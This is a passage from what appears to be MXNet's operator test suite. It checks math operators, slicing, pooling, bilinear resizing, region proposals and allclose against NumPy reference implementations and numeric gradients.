lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
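# Illustrative note (assumption: mx slice follows numpy basic slicing on the leading axes,
# which is exactly how b_np = a_np[index] is constructed above). For example, the
# begin=[0, None], end=[1, None], step=[2, -1] case corresponds to a_np[0:1:2, ::-1]
# applied to the first two axes of the (2, 2, 3, 3) input.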
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,):  # as an exception, an all-ones shape such as (1, 1, 1, 1) squeezes to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
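# Worked example of the adaptive pooling windows computed above for isize=10, osize=3:
#   oh=0: [floor(0*10/3), ceil(1*10/3)) = [0, 4)
#   oh=1: [floor(1*10/3), ceil(2*10/3)) = [3, 7)
#   oh=2: [floor(2*10/3), ceil(3*10/3)) = [6, 10)
# so neighbouring windows may overlap and together cover the whole input axis.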
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
            data_np_like = x_1.asnumpy()
            check_symbolic_forward(resize_sym, [data_np, data_np_like], [expected], rtol=1e-3, atol=1e-5)
            check_symbolic_backward(resize_sym, [data_np, data_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
            check_numeric_gradient(resize_sym, [data_np, data_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
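    # Checks mx.nd.contrib.MultiProposal against per-image mx.nd.contrib.Proposal results
    # (same rois, scores, and batch indices) and verifies that the backward pass yields
    # all-zero gradients for every input.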
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
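        # The expected input gradients are all zeros, presumably because proposal generation
        # is not a differentiable operation.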
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
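    # Analytical gradient used for the backward check below: d/dx (a*x^2 + b*x + c) = 2*a*x + b.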
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
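    # Compares mx.nd.contrib.allclose against numpy.allclose on randomly perturbed pairs of
    # arrays over several dtypes and shapes; on a mismatch it prints the offending elements
    # as seen by each side before failing.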
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
                    # Report the elements judged "not close" on this side, together with the
                    # corresponding elements on the comparison (CPU/GPU/Python) side that judged them "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
                    # Collect the indices of all violations and the corresponding element values
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
                    idx = np.argwhere(bad_indexes)
                    idx_flat = np.flatnonzero(bad_indexes)
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
            if expected != result[0] or (num_ctx > 1 and expected != result[1]):
assert False
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_context()])
def test_histogram():
def f(x, bins=10, range=None):
